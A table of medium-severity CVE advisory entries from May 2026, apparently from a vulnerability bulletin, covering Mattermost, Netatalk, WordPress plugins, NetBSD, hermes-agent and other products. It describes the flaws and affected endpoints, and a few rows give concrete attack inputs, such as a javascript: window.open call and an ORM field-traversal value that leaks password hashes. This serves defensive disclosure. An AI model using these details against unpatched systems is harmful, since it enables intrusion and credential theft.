| lykich--Correct Prices | The Correct Prices plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] variable in versions up to and including 1.0. This is due to the correct_prices_page() function echoing $_SERVER['PHP_SELF'] into a form's action attribute without any input sanitization or output escaping (such as esc_url() or esc_attr()). Because PHP_SELF reflects attacker-controlled path-info appended to the script URL, an attacker can break out of the attribute and inject arbitrary markup. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a specially crafted link. | 2026-05-20 | 6.1 | CVE-2026-8627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/605c6c53-6920-42ba-8784-b3a186bbf821?source=cve https://plugins.trac.wordpress.org/browser/correct-prices/trunk/correct_prices.php#L134 |
| Magepeople inc.--WpBookingly | Missing Authorization vulnerability in Magepeople inc. WpBookingly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WpBookingly: from n/a through 1.2.9. | 2026-05-20 | 6.5 | CVE-2026-27405 | https://patchstack.com/database/wordpress/plugin/service-booking-manager/vulnerability/wordpress-wpbookingly-plugin-1-2-9-broken-access-control-vulnerability?_s_id=cve |
| makeplane--plane | Plane is an open-source project management tool. In versions 1.3.0 and below, SavedAnalyticEndpoint passes the user-controlled segment query parameter directly to a Django F() expression without validation (unlike the regular AnalyticsEndpoint, which checks against an allowlist), causing ORM Field Reference Injection. An authenticated workspace MEMBER can send GET /api/workspaces/<slug>/saved-analytic-view/<analytic_id>/ with a crafted segment value that is forwarded into build_graph_plot() and traverses foreign-key relationships (e.g. workspace__owner__password) before being projected via .values("dimension", "segment"), returning the referenced field values directly in the JSON response. This exposes sensitive data such as bcrypt password hashes, API tokens, and related users' email addresses, making it a stronger primitive than the related order_by injection where values are only leaked through ordering. This issue has been fixed in version 1.3.1. | 2026-05-20 | 6.5 | CVE-2026-40102 | https://github.com/makeplane/plane/security/advisories/GHSA-93x3-ghh7-72j3 https://github.com/makeplane/plane/releases/tag/v1.3.1 |
| manchumahara--CBX 5 Star Rating & Review | The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-05-22 | 6.1 | CVE-2026-6864 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9ee11e19-21a6-45df-a118-f6dec3b55bc1?source=cve https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-rating-avg-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.7/templates/admin/admin-rating-review-review-logs.php#L41 https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-review-logs.php https://plugins.trac.wordpress.org/browser/cbxscratingreview/tags/1.0.8/templates/admin/admin-rating-review-rating-avg-logs.php |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and below contain flawed logic that causes improper escaping of a textarea custom field's contents in the Update Issue page, (bug_update_page.php) allowing an attacker to inject HTML and, if CSP settings permit, execute arbitrary JavaScript when the page is loaded. This facilitates session theft, leading to admin account takeover, full project data access. In order to exploit this issue, a textarea-type custom field must be configured for the project, the attack must be carried out by an authenticated user with bug report permission (low privilege). This can affect any user viewing the bug edit form, including administrators. The issue has been fixed in version 2.28.2. If users cannot immediately upgrade, they can work around the issue by using the default Content-Security Policy, which blocks script execution. | 2026-05-20 | 5.4 | CVE-2026-39960 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-qj6w-v29q-4rgx https://github.com/mantisbt/mantisbt/commit/5fec0f448b7a7d7d539a6adb6dccceac4e4e4ab7 |
| mantisbt--mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow an authenticated user to upload attachments to private Issues they are not authorized to access. This issue has been fixed in version 2.28.2. | 2026-05-19 | 4.3 | CVE-2026-34754 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-h4x5-gvx6-3rwc https://github.com/mantisbt/mantisbt/commit/b262b4d2835b81394d75356dead66e52a6275206 https://mantisbt.org/bugs/view.php?id=36976 |
| Mattermost--Mattermost | Mattermost Mobile Apps versions <=2.37 11.4 2.0.37 11.0.4 11.1.3 11.3.2 10.11.11.0 fail to properly validate the SSO authentication callback origin which allows an attacker controlling a malicious Mattermost server to steal user credentials for a legitimate Mattermost server via relaying the SSO code exchange flow through the mobile application. Mattermost Advisory ID: MMSA-2025-00564 | 2026-05-21 | 6.1 | CVE-2026-22880 | MMSA-2025-00564 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to properly check for permissions when processing commands in the Gitlab plugin which allows normal users to uninstall instances or setup webhook connections via the {{gitlab instance {option}}} or the {{/gitlab webhook {option}}} commands. Mattermost Advisory ID: MMSA-2026-00600 | 2026-05-18 | 6.5 | CVE-2026-3117 | MMSA-2026-00600 |
| Mattermost--Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent an invalid URL from loading in a pop-up window in the Mattermost Desktop App which allows a malicious server owner to repeated crash the application via calling {{window.open('javascript:alert()');}}. Mattermost Advisory ID: MMSA-2026-00618 | 2026-05-18 | 6.5 | CVE-2026-3471 | MMSA-2026-00618 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to archive the channel before removing persistent notifications which allows authenticated user to crash the server via timing the creation of persistent notification message between the server deleting existing persistent notifications and archiving the channel.. Mattermost Advisory ID: MMSA-2026-00637 | 2026-05-22 | 6.5 | CVE-2026-4635 | MMSA-2026-00637 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to verify channel membership when processing AI-assisted message rewrites which allows an authenticated attacker to read the content of threads in private channels and direct messages they do not have access to via a crafted request to the post rewrite endpoint.. Mattermost Advisory ID: MMSA-2026-00645 | 2026-05-18 | 6.5 | CVE-2026-5163 | MMSA-2026-00645 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.2, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the TIFF IFD offset in the image header before allocating memory, which allows authenticated users with file upload or posting permissions to cause a denial of service (server OOM) via uploading a crafted TIFF file or posting a URL that serves one.. Mattermost Advisory ID: MMSA-2026-00648 | 2026-05-22 | 6.5 | CVE-2026-5755 | MMSA-2026-00648 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail prevent disclosure of created user password which allows a malicious attacker to impersonate a user via the use of some of those passwords.. Mattermost Advisory ID: MMSA-2026-00614 | 2026-05-18 | 6.5 | CVE-2026-6345 | MMSA-2026-00614 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate the OAuth token scope on the callback which allows an authenticated Mattermost user to gain access to private repositories via modifying the scope parameter in the GitHub authorization URL.. Mattermost Advisory ID: MMSA-2026-00628 | 2026-05-22 | 5.4 | CVE-2026-28735 | MMSA-2026-00628 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate file ownership and access control, which allows an authenticated user to access and download files belonging to other users or teams via crafted Boards API requests using valid file IDs.. Mattermost Advisory ID: MMSA-2026-00620 | 2026-05-22 | 5.9 | CVE-2026-3473 | MMSA-2026-00620 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to limit the size of the request body on the start meeting API endpoint, which allows an authenticated attacker to cause resource exhaustion or denial of service via a crafted oversized HTTP POST request to {{/api/v1/meetings}}.. Mattermost Advisory ID: MMSA-2026-00608 | 2026-05-18 | 4.3 | CVE-2026-2325 | MMSA-2026-00608 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 Fail to enforce slash command trigger-word uniqueness during command updates which allows an authenticated team member with Manage Own Slash Commands permission to hijack and impersonate existing system or custom slash commands via editing their own slash command trigger to an already-registered trigger through the command update API. Mattermost Advisory ID: MMSA-2026-00597 | 2026-05-18 | 4.3 | CVE-2026-28732 | MMSA-2026-00597 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate that a remote cluster has access to a channel before processing membership removal requests during shared channel membership sync, which allows a malicious remote cluster to remove any user from any channel, including private channels, via crafted membership sync messages targeting channels the remote cluster is not authorized to access. Mattermost Advisory ID: MMSA-2026-00576 | 2026-05-18 | 4.3 | CVE-2026-28759 | MMSA-2026-00576 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to sanitize team member data when returned via API to users without elevated permissions which allows a user without permissions to get data about team members roles via invoking various team API endpoints.. Mattermost Advisory ID: MMSA-2026-00626 | 2026-05-22 | 4.3 | CVE-2026-3636 | MMSA-2026-00626 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check the create_post channel permission during post edit operations which allows an authenticated attacker with revoked posting privileges to modify their existing posts via direct API requests to the post update and patch endpoints.. Mattermost Advisory ID: MMSA-2026-00627 | 2026-05-18 | 4.3 | CVE-2026-3637 | MMSA-2026-00627 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1 fail to validate team-level run_create permission against the target team when creating a playbook run which allows an authenticated team member to create runs in teams where they lack permission via specifying a different team ID in the run creation API request. Mattermost Advisory ID: MMSA-2026-00629 | 2026-05-21 | 4.3 | CVE-2026-4055 | MMSA-2026-00629 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to validate user-supplied input in API request handlers which allows an authenticated attacker to crash the plugin process via a crafted HTTP request to the PR details endpoint.. Mattermost Advisory ID: MMSA-2026-00638 | 2026-05-22 | 4.3 | CVE-2026-4646 | MMSA-2026-00638 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.0, 11.5.x <= 11.5.3, 11.4.x <= 11.4.4, 10.11.x <= 10.11.14 fail to enforce request body size limits on plugin HTTP endpoints which allows an attacker to cause a denial of service via crafted oversized HTTP requests.. Mattermost Advisory ID: MMSA-2026-00646 | 2026-05-22 | 4.9 | CVE-2026-5308 | MMSA-2026-00646 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 11.4.x <= 11.4.3 fail to validate the X-Requested-With header on the burn-on-read reveal endpoint which allows an authenticated channel member to force the reveal of a burn-on-read message without recipient consent via a crafted Markdown image tag.. Mattermost Advisory ID: MMSA-2026-00636 | 2026-05-18 | 4.3 | CVE-2026-6339 | MMSA-2026-00636 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to validate 7zip archive structure before processing which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted 7zip file with excessive folder declarations.. Mattermost Advisory ID: MMSA-2026-00573 | 2026-05-18 | 4.3 | CVE-2026-6340 | MMSA-2026-00573 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to have API-level checks on which groups the user can create issues or attach comments to which allows a user that is member of multiple groups to create issues to a locked group via direct API requests. Mattermost Advisory ID: MMSA-2026-00602 | 2026-05-18 | 4.3 | CVE-2026-6341 | MMSA-2026-00602 |
| Mattermost--Mattermost | Mattermost Plugins versions <=11.5 11.1.5 10.13.11 11.3.4.0 fail to appropriately check for valid namespaces which allows plugin users to create subscriptions to groups that were not whitelisted via creating groups that share the same prefix as a whitelisted group. Mattermost Advisory ID: MMSA-2026-00601 | 2026-05-18 | 4.3 | CVE-2026-6342 | MMSA-2026-00601 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13, 11.4.x <= 11.4.3 fail to check public/private permissions which allows members without these permissions to access public playbooks via /get.. Mattermost Advisory ID: MMSA-2026-00591 | 2026-05-18 | 4.3 | CVE-2026-6343 | MMSA-2026-00591 |
| mcinvale--Faces of Users | The Faces of Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'default' shortcode attribute in the 'facesofusers' shortcode in all versions up to, and including, 0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-8038 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ea39d249-0345-4028-af58-31b298376950?source=cve https://plugins.trac.wordpress.org/browser/faces-of-users/trunk/faces-of.php#L62 https://plugins.trac.wordpress.org/browser/faces-of-users/tags/0.0.3/faces-of.php#L62 |
| Mesalvo--Meona Client Launcher Component | Cleartext Storage of Sensitive Information in Memory vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 6 | CVE-2026-0857 | https://seccore.at/blog/cves-meona/ |
| Mesalvo--Meona Client Launcher Component | Insufficient Verification of Data Authenticity vulnerability in Mesalvo Meona Client Launcher Component, Mesalvo Meona Server Component makes it possible to send messages to any email address. This issue affects Meona Client Launcher Component: through 19.06.2020 15:11:49; Meona Server Component: through 2025.04 5+323020. | 2026-05-20 | 4.4 | CVE-2026-25602 | https://seccore.at/blog/cves-meona/ |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-22 | 6.5 | CVE-2026-42827 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft Defender Antimalware Platform | Microsoft Defender Denial of Service Vulnerability | 2026-05-20 | 4 | CVE-2026-45498 | Microsoft Defender Denial of Service Vulnerability |
| Microsoft--Microsoft Edge (Chromium-based) | Improper input validation in Microsoft Edge (Chromium-based) allows an unauthorized attacker to bypass a security feature over a network. | 2026-05-18 | 5.4 | CVE-2026-45492 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | 2026-05-18 | 5.4 | CVE-2026-45494 | Microsoft Edge (Chromium-based) Spoofing Vulnerability |
| Microsoft--Windows 11 Version 24H2 | Microsoft is aware of a security feature bypass vulnerability in Windows publicly referred to as "YellowKey". The proof of concept for this vulnerability has been made public violating coordinated vulnerability best practices. We are issuing this CVE to provide mitigation guidance that can be implemented to protect against this vulnerability until the security update is made available. Mitigation FAQs Should I leverage the temporary mitigation? Microsoft recommends that you consider implementing these mitigations if you are concerned your devices and data are at risk of being compromised or stolen. For example, if your organization's employees take their work devices home or on business travel. What impact to service availability/management could be caused by implementing the mitigations? Implementing these mitigations will not impact service availability or management operations. Do customers need to revert the changes made to mitigate the vulnerability once the security update to protect against this vulnerability is available? No. The security update will maintain the mitigation's behavior once the security update is installed. I am using TPM+PIN, am I at risk of this vulnerability being exploited No, if you are using TPM+PIN the vulnerability is not exploitable. | 2026-05-19 | 6.8 | CVE-2026-45585 | Windows BitLocker Security Feature Bypass Vulnerability |
| MongoDB, Inc.--C Driver | The MongoDB C Driver's legacy GridFS API accepts malformed file metadata from the database without adequate validation. Crafted documents in a GridFS collection may cause any application that reads those files via the legacy API to either crash (via a division-by-zero) or silently leak process memory contents (via an out-of-bounds read). | 2026-05-20 | 5.9 | CVE-2026-9100 | https://jira.mongodb.org/browse/CDRIVER-6281 |
| MongoDB, Inc.--Compass | Prototype pollution in csv parsing logic during import can lead to untrusted file paths (but not arguments) entering shell.openExternal after specific user behavior leading to "1-click" command execution. | 2026-05-20 | 4.3 | CVE-2026-9101 | https://jira.mongodb.org/browse/COMPASS-10657 |
| MongoDB, Inc.--MongoDB Server | Creating a "2dsphere_bucket" index on a non-timeseries bucket collection will succeed, but any subsequent attempt to insert a document which triggers updating that index will crash the server. A similar issue occurs when creating "queryable_encrypted_range" indices. This issue affects MongoDB Server v7.0 versions prior to 7.0.32, v8.0 versions prior to 8.0.21 and v8.2 versions prior to 8.2.6 | 2026-05-18 | 6.5 | CVE-2026-8843 | https://jira.mongodb.org/browse/SERVER-116327 |
| mrdollar4444--GSheet For Woo Importer | The GSheet For Woo Importer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the process_ajax_restore_action() function in all versions up to, and including, 2.3.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's Google Sheets API token and configuration options. | 2026-05-21 | 4.3 | CVE-2026-4843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0d60991-0675-4efa-9427-380e6b59fe28?source=cve https://plugins.trac.wordpress.org/browser/import-products-from-gsheet-for-woo-importer/tags/2.3.1/src/Actions/AdminSettingsAction.php#L391 |
| n/a--Ettercap | A vulnerability has been found in Ettercap up to 0.8.3. The affected element is the function FUNC_DECODER of the file src/dissectors/ec_gg.c of the component GG Dissector. The manipulation of the argument gg leads to heap-based buffer overflow. The attack is possible to be carried out remotely. The complexity of an attack is rather high. The exploitability is described as difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 0.8.4 is sufficient to fix this issue. The identifier of the patch is feeae6fa366e01a3dd9f1857ec6aae847b2ae00c. It is suggested to upgrade the affected component. | 2026-05-24 | 5.6 | CVE-2026-9365 | VDB-365328 | Ettercap GG Dissector ec_gg.c FUNC_DECODER heap-based overflow VDB-365328 | CTI Indicators (IOB, IOC, IOA) Submit #813142 | Ettercap <=v0.8.4 Heap-based Buffer Overflow https://github.com/Ettercap/ettercap/issues/1306 https://github.com/Ettercap/ettercap/pull/1307 https://github.com/Ettercap/ettercap/commit/feeae6fa366e01a3dd9f1857ec6aae847b2ae00c https://github.com/Ettercap/ettercap/ |
| n/a--exifreader | Versions of the package exifreader before 4.39.0 are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) due to decompressing PNG zTXt metadata without enforcing a built-in maximum decompressed output size. When asynchronous parsing is enabled, a crafted PNG file containing a highly compressed zTXt chunk can cause ExifReader to materialize a disproportionately large Comment value in memory. | 2026-05-19 | 5.3 | CVE-2026-8814 | https://security.snyk.io/vuln/SNYK-JS-EXIFREADER-16689340 https://gist.github.com/yuki-matsuhashi/cad1a45d936062438b4ab24613c34c55 https://github.com/mattiasw/ExifReader/commit/5f116128adc19f674902f8bf582bfe7dd0a36375 |
| n/a--JPress | A vulnerability was determined in JPress up to 1.0.3. The affected element is an unknown function of the file /ucenter/article/doWriteSave of the component UCenter Article Submission Endpoint. Executing a manipulation of the argument id/userId can lead to improper authorization. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 6.3 | CVE-2026-9376 | VDB-365339 | JPress UCenter Article Submission Endpoint doWriteSave improper authorization VDB-365339 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813253 | JPress 1.0.3 Improper Authorization https://github.com/JPressProjects/jpress/issues/194 |
| n/a--postcss | A vulnerability was determined in postcss up to 7.1.1. Affected is the function toString of the file src/selectors/container.js of the component AST Serialization. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor explains, that according to his definition "DoS on server-side on user-generated CSS is low risk for us (since most users compile own CSS with PostCSS)." | 2026-05-24 | 4.3 | CVE-2026-9358 | VDB-365321 | postcss AST Serialization container.js toString recursion VDB-365321 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813080 | postcss-selector-parser postcss <= 7.1.1 CWE-674: Uncontrolled Recursion https://gist.github.com/bx33661/581e3a38134601c04e19b4dfc9b459b9 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. In versions 0.24.10 and below, when NanoMQ handles high-concurrency reconnect traffic using a reconnect-collision payload, the broker can crash due to a NULL pointer dereference during MQTT session resumption for clean_start=0 clients. The transport's p_peer callback (tcptran_pipe_peer()) iterates cpipe->subinfol while copying session metadata from the cached old pipe to the new reconnecting pipe, without checking whether the pointer is NULL. Under a reconnect race, cpipe->subinfol can be freed and set to NULL before session restore invokes this function, resulting in a remote unauthenticated Denial-of-Service (process crash) condition. This issue has been fixed in version 0.24.11. | 2026-05-19 | 5.9 | CVE-2026-32134 | https://github.com/nanomq/nanomq/security/advisories/GHSA-q36f-83mh-pcv2 https://github.com/nanomq/nanomq/issues/2241 https://github.com/nanomq/NanoNNG/commit/522ec62e29e60d1122f2aedaa6e702dcf089f7bb https://github.com/nanomq/nanomq/releases/tag/0.24.11 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In versions prior to 2026, the Library module stores and serves uploaded images byte-for-byte, without stripping EXIF/XMP/IPTC metadata. Any authenticated user who downloaded an image could extract the uploader's embedded metadata, which included GPS coordinates, device information, timestamps, embedded comments/notes, thumbnail previews, and other personally identifiable information (PII) preserved in the image metadata. Of all FacturaScripts' image upload features, only the Library module combined unrestricted uploads, persistent storage, authenticated download access, and a total lack of server-side metadata sanitization. This vulnerability carries significant real-world impact: an employee uploading a photo taken at their home inadvertently discloses their precise home address to every user with Library download access. This issue has been fixed in version 2026. | 2026-05-18 | 6.5 | CVE-2026-27892 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-q7f2-rv22-2xgr https://github.com/NeoRazorX/facturascripts/commit/b0725147a61a9a377b7180589af33ff52b4751e2 |
| Netatalk--Netatalk | Netatalk 2.0.0 through 4.4.2 generates AFP session tokens derived from predictable process IDs, which allows a remote authenticated attacker to cause a denial of service by exploiting the reconnect mechanism. | 2026-05-21 | 6.5 | CVE-2026-44054 | Netatalk Security Advisory CVE-2026-44054 |
| Netatalk--Netatalk | A stack-based buffer overflow in desktop.c in Netatalk 1.3 through 4.2.2 allows a remote authenticated attacker to cause a denial of service, obtain limited information, or modify limited data. | 2026-05-21 | 6 | CVE-2026-44056 | Netatalk Security Advisory CVE-2026-44056 |
| Netatalk--Netatalk | An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism. | 2026-05-21 | 6.4 | CVE-2026-44058 | Netatalk Security Advisory CVE-2026-44058 |
| Netatalk--Netatalk | Insufficient sanitization of volume paths in Netatalk 3.1.0 through 4.4.2 allows a local privileged user to inject OS commands and execute arbitrary code via a crafted volume path. | 2026-05-21 | 6.7 | CVE-2026-44076 | Netatalk Security Advisory CVE-2026-44076 |
| Netatalk--Netatalk | Netatalk 1.5.0 through 4.4.2 uses DES-ECB for authentication with a timing side channel, which allows a remote attacker to recover authentication credentials via timing analysis. | 2026-05-21 | 5.9 | CVE-2026-44061 | Netatalk Security Advisory CVE-2026-44061 |
| Netatalk--Netatalk | An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input. | 2026-05-21 | 4.2 | CVE-2026-44063 | Netatalk Security Advisory CVE-2026-44063 |
| Netatalk--Netatalk | Authentication modules in Netatalk 1.5.0 through 4.4.2 fail to check the return value of seteuid(), which may allow a remote authenticated attacker to retain elevated privileges under error conditions. | 2026-05-21 | 4 | CVE-2026-44073 | Netatalk Security Advisory CVE-2026-44073 |
| NetBSD--src | NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic. | 2026-05-18 | 5.5 | CVE-2026-32849 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c |
| NetBSD--src | NetBSD prior to commit ec8451e contains a race condition vulnerability in cryptodev_op() within the opencrypto subsystem that allows local attackers to trigger a double-free condition by concurrently issuing CIOCCRYPT operations on the same session identifier on SMP systems. Attackers can exploit mutable per-operation state embedded in the csession struct to corrupt kernel heap memory. | 2026-05-18 | 4.7 | CVE-2026-32848 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-cryptodev-race-condition-double-free-via-cryptodev-op |
| nimiq--core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, eventually leading to address book crash. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect("every peer should have at least one address"). If the attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node/RPC task depending on panic settings. This issue has been fixed in version 1.4.0. | 2026-05-20 | 4.3 | CVE-2026-40094 | https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6x25-3cjq https://github.com/nimiq/core-rs-albatross/pull/3715 https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.16. This vulnerability affects the function _is_blocked_device of the file tools/file_tools.py of the component read_file Tool. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9351 | VDB-365314 | NousResearch hermes-agent read_file Tool file_tools.py _is_blocked_device path traversal VDB-365314 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812214 | NousResearch hermes-agent 2026.4.16 Path Traversal (CWE-22) https://gist.github.com/YLChen-007/1d1aeff404cb88e06ec2fb3377f49fef |
| NousResearch--hermes-agent | A vulnerability was detected in NousResearch hermes-agent up to 2026.4.16. The affected element is an unknown function of the component Slack Agent/Mattermost Agent. The manipulation of the argument format_message results in escaping of output. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9354 | VDB-365317 | NousResearch hermes-agent Slack Agent/Mattermost Agent escape output VDB-365317 | CTI Indicators (IOB, IOC, IOA) Submit #812226 | NousResearch hermes-agent 2026.4.16 Improper Encoding or Escaping of Output (CWE-116) https://gist.github.com/YLChen-007/e90fb38ac03284176bae49898a3a46a4 |
| NousResearch--hermes-agent | A weakness has been identified in NousResearch hermes-agent up to 2026.4.23. This issue affects the function _make_run_env of the file tools/environments/local.py of the component Messaging Gateway Handler. Executing a manipulation can lead to information disclosure. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9352 | VDB-365315 | NousResearch hermes-agent Messaging Gateway local.py _make_run_env information disclosure VDB-365315 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #812215 | NousResearch hermes-agent 2026.4.23 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/760b3940f708990e535214529c0c7a27 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent 2026.4.23. Affected is the function _discover_dashboard_plugins of the file hermes_cli/web_server.py of the component CLI web-dashboard Interface. Performing a manipulation of the argument HERMES_ENABLE_PROJECT_PLUGINS results in incorrect comparison. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9369 | VDB-365332 | NousResearch hermes-agent CLI web-dashboard web_server.py _discover_dashboard_plugins comparison VDB-365332 | CTI Indicators (IOB, IOC, IOA) Submit #812230 | NousResearch hermes-agent 2026.4.23 Incorrect Comparison (CWE-697) https://gist.github.com/YLChen-007/062b77ceac6aa9844842a616f5d2ef30 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can push malicious remote strategies containing HTML tags through the sync. When a victim views the affected remote strategy in the Smart Polling functionality, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 6.5 | CVE-2025-40904 | https://security.nozominetworks.com/NN-2026:7-01 |
